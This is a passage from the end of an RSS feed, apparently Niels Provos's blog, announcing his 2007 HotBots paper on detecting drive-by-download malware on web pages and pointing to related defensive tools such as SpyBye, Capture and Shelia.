    <wfw:comment>http://www.provos.org/wfwcomment.php?cid=17</wfw:comment>

    <slash:comments>0</slash:comments>
    <wfw:commentRss>http://www.provos.org/rss.php?version=2.0&amp;type=comments&amp;cid=17</wfw:commentRss>
    

    <author>nospam@example.com (Niels Provos)</author>
    <content:encoded>
            During &lt;a href=&quot;http://www.usenix.org/events/hotbots07/tech/&quot;&gt;HotBots&lt;/a&gt; last month, I presented a paper on a systematic approach for detecting malware on the web called &quot;&lt;a href=http://www.usenix.org/events/hotbots07/tech/full_papers/provos/provos.pdf&gt;The Ghost In The Browser&lt;/a&gt;&quot;.  The paper enumerates all the different ways in which a web page can become malicious and contains some measurements on the prevalance of drive-by-downloads; an in depth analysis of 4.5 million URLs detected 450,000 that were surreptitiously installing malware.  All the more reason for tools such as SpyBye.  Fortunately, I am not the only one working on such tools.   Christian Seifert from the New Zealand Honeypot Alliance recently announced a &lt;a href=http://www.nz-honeynet.org/cwebservice.php&gt;web interface&lt;/a&gt; to their Capture honey client which runs a browser against URLs specified by you.  In a similar vein, &lt;a href=http://www.cs.vu.nl/~herbertb/misc/shelia/&gt;Shelia&lt;/a&gt; is a tool that scans your mail folder and follows URLs contained in it for malware and exploits.   
    </content:encoded>

    <pubDate>Wed, 09 May 2007 19:27:43 -0700</pubDate>
    <guid isPermaLink="false">http://www.provos.org/index.php?/archives/17-guid.html</guid>
    <category>malware</category>
<category>research</category>
<category>security</category>

</item>

</channel>
</rss>